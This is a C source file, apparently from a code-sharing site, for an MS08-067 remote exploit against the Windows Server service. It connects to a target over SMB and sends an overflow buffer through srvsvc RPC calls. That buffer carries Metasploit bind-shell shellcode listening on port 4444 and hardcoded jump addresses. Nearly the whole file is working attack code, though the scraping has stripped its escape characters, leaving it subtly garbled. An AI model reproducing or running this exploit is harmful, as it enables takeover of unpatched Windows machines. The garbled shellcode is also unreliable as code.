MS08-067.c
上传用户:fsojjn
上传日期:2015-10-05
资源大小:12k
文件大小:6k
开发平台:

Visual C++

  1. #include <winsock2.h>
  2. #include <windows.h>
  3. #include <stdio.h>
  4. #include <io.h>
  5. #include <fcntl.h>
  6. #include <memory.h>
  7. #include <wchar.h>
  8. #include "srvsvc.h"
  9. #include "srvsvc_c.c"
  10. #include "mem.h"
  11. #pragma comment(lib,"ws2_32")
  12. #pragma comment(lib,"mpr")
  13. #pragma comment(lib,"rpcrt4.lib")
  14. #pragma comment(lib,"MSVCRT.LIB")
  15. DWORD dwRetAddr = 0x7ffa0eb8;
  16. DWORD dwJmpAddr = 0x7ffa0eb7;
  17. /* win32_bind -  EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
  18. unsigned char sc[] =
  19. "x83xECx70" // sub esp, 0x70
  20. "x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xad"
  21. "x07xe6x4ax83xebxfcxe2xf4x51x6dx0dx07x45xfex19xb5"
  22. "x52x67x6dx26x89x23x6dx0fx91x8cx9ax4fxd5x06x09xc1"
  23. "xe2x1fx6dx15x8dx06x0dx03x26x33x6dx4bx43x36x26xd3"
  24. "x01x83x26x3exaaxc6x2cx47xacxc5x0dxbex96x53xc2x62"
  25. "xd8xe2x6dx15x89x06x0dx2cx26x0bxadxc1xf2x1bxe7xa1"
  26. "xaex2bx6dxc3xc1x23xfax2bx6ex36x3dx2ex26x44xd6xc1"
  27. "xedx0bx6dx3axb1xaax6dx0axa5x59x8exc4xe3x09x0ax1a"
  28. "x52xd1x80x19xcbx6fxd5x78xc5x70x95x78xf2x53x19x9a"
  29. "xc5xccx0bxb6x96x57x19x9cxf2x8ex03x2cx2cxeaxeex48"
  30. "xf8x6dxe4xb5x7dx6fx3fx43x58xaaxb1xb5x7bx54xb5x19"
  31. "xfex54xa5x19xeex54x19x9axcbx6fxf7x16xcbx54x6fxab"
  32. "x38x6fx42x50xddxc0xb1xb5x7bx6dxf6x1bxf8xf8x36x22"
  33. "x09xaaxc8xa3xfaxf8x30x19xf8xf8x36x22x48x4ex60x03"
  34. "xfaxf8x30x1axf9x53xb3xb5x7dx94x8exadxd4xc1x9fx1d"
  35. "x52xd1xb3xb5x7dx61x8cx2excbx6fx85x27x24xe2x8cx1a"
  36. "xf4x2ex2axc3x4ax6dxa2xc3x4fx36x26xb9x07xf9xa4x67"
  37. "x53x45xcaxd9x20x7dxdexe1x06xacx8ex38x53xb4xf0xb5"
  38. "xd8x43x19x9cxf6x50xb4x1bxfcx56x8cx4bxfcx56xb3x1b"
  39. "x52xd7x8exe7x74x02x28x19x52xd1x8cxb5x52x30x19x9a"
  40. "x26x50x1axc9x69x63x19x9cxffxf8x36x22x42xc9x06x2a"
  41. "xfexf8x30xb5x7dx07xe6x4a";
  42. int MakeBuff(char *Buff,int BufLen);
  43. void Usage(char *ProgName);
  44. int WaitExit();
  45. #define CN 0
  46. #define TW 1
  47. void main(int argc, char *argv[])
  48. {
  49. NETRESOURCE lpNetResource;
  50. char Username[256] = {0};
  51. char Password[256] = {0};
  52. DWORD Ret = 0;
  53. RPC_STATUS status;
  54. unsigned char * pszUuid = NULL;
  55. unsigned char * pszProtocolSequence = "ncacn_np";
  56. unsigned char * pszNetworkAddress = "";
  57. unsigned char pszEndpoint[100] = "\pipe\browser";
  58. unsigned char * pszOptions = NULL;
  59. unsigned char * pszStringBinding = NULL;
  60. char Server[256] = {0};
  61. char RemoteName[256] = {0};
  62. char Buff[0x700];
  63. char Buff2[1000] = {0};
  64. char *pBuff2 = (char *)&Buff2;
  65. char Buff3[100] = {0};
  66. int BufLen = 0;
  67. // int i;
  68. int ForceAttack = 0;
  69. int AntiDEP = 0;
  70. int nLanguage = 0;
  71. DWORD dwID = 0;
  72. if(argc != 2)
  73. {
  74. Usage(argv[0]);
  75. return;
  76. }
  77. strcpy(Server,argv[1]);
  78. sprintf(RemoteName,"\\%s\IPC$",Server);
  79. pszNetworkAddress = Server;
  80. if(strlen(Server) == 0)
  81. {
  82. Usage(argv[0]);
  83. return;
  84. }
  85. printf("nMS08-067 Exploit for CN by EMM@ph4nt0m.orgnn");
  86. lpNetResource.dwScope=RESOURCE_CONNECTED;
  87. lpNetResource.dwType =RESOURCETYPE_DISK;
  88. lpNetResource.dwDisplayType=RESOURCEDISPLAYTYPE_SHARE;
  89. lpNetResource.dwUsage=RESOURCEUSAGE_CONNECTABLE;
  90. lpNetResource.lpLocalName=NULL;
  91. lpNetResource.lpRemoteName = RemoteName;
  92. lpNetResource.lpComment=NULL;
  93. lpNetResource.lpProvider=NULL;
  94. Ret = WNetAddConnection2(&lpNetResource,Username,Password,CONNECT_UPDATE_PROFILE);
  95. if(Ret != NO_ERROR)
  96. {
  97. printf("Make SMB Connection error:%dn",GetLastError());
  98. return;
  99. }
  100. printf("SMB Connect OK!n");
  101. status = RpcStringBindingCompose(pszUuid,
  102. pszProtocolSequence,
  103. pszNetworkAddress,
  104. pszEndpoint,
  105. pszOptions,
  106. &pszStringBinding);
  107. if(status != RPC_S_OK)
  108. {
  109. return;
  110. }
  111. status = RpcBindingFromStringBinding(pszStringBinding,&srvsvc__MIDL_AutoBindHandle);
  112. if(status != RPC_S_OK)
  113. {
  114. return;
  115. }
  116.    RpcTryExcept
  117.     {
  118. func23(L"ph4nt0m",(wchar_t *)"x53x00x56x89x56x89x56x89x56x89",(wchar_t *)"x4Dx00x56x89x56x89",4,0);
  119. memset(Buff,0,sizeof(Buff));
  120. BufLen = MakeBuff(Buff,sizeof(Buff));
  121. CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)WaitExit,(LPVOID)NULL,0,&dwID);
  122. (DWORD)*(DWORD *)Buff3 = 1;
  123. func1f(L"EMM!",(wchar_t *)Buff,Buff2,1000,L"",(DWORD *)Buff3,1);
  124.     }
  125.     RpcExcept ( 1 )
  126.     {
  127.         status = RpcExceptionCode();
  128. if(status == 1726)
  129. {
  130. }
  131. else
  132. {
  133. printf("RpcExceptionCode() = %urn", status );
  134. return;
  135. }
  136.     }
  137.     RpcEndExcept
  138. //*/
  139. printf("Maybe Patched!n");
  140.     RpcStringFree( &pszStringBinding );
  141.     RpcBindingFree( &srvsvc__MIDL_AutoBindHandle );
  142. return;
  143. }
  144. #define JMPPOINT "B041"
  145. int MakeBuff(char *Buff, int BufLen)
  146. {
  147. int len = 0;
  148. char tmp[5] = {0};
  149. int i;
  150. for(i = 0; i < BufLen/4; i++)
  151. {
  152. memset(tmp,0,4);
  153. sprintf(tmp,"B%03d",i);
  154. //*
  155. if(memcmp(tmp,JMPPOINT,4) == 0)
  156. {
  157. break;
  158. }
  159. //*/
  160. memcpy(Buff + len,tmp,4);
  161. len += 4;
  162. }
  163. memcpy(Buff,L".\\a\..\..\NN",13*2);
  164. for(i = 0; i < 6; i++)
  165. {
  166. memcpy(Buff + len,&dwRetAddr,4);
  167. len += 4;
  168. }
  169. memcpy(Buff + len,&dwJmpAddr,4);
  170. len += 4;
  171. memset(Buff + len,0x48,0x4);
  172. len += 4;
  173. memcpy(Buff + len,sc,sizeof(sc) - 1);
  174. len += sizeof(sc) - 1;
  175. memcpy(Buff + len,"EMM!",4);
  176. len += 4;
  177. memset(Buff + 0x206 * 2,0,2);
  178. return len;
  179. }
  180. void Usage(char *ProgName)
  181. {
  182. printf("n MS08-067 Exploit for CN by EMM@ph4nt0m.orgnn %s <Server>nn",ProgName);
  183. return;
  184. }
  185. int WaitExit()
  186. {
  187. Sleep(1000 * 5);
  188. printf("Send Payload Over!n");
  189. ExitProcess(0);
  190. return 0;
  191. }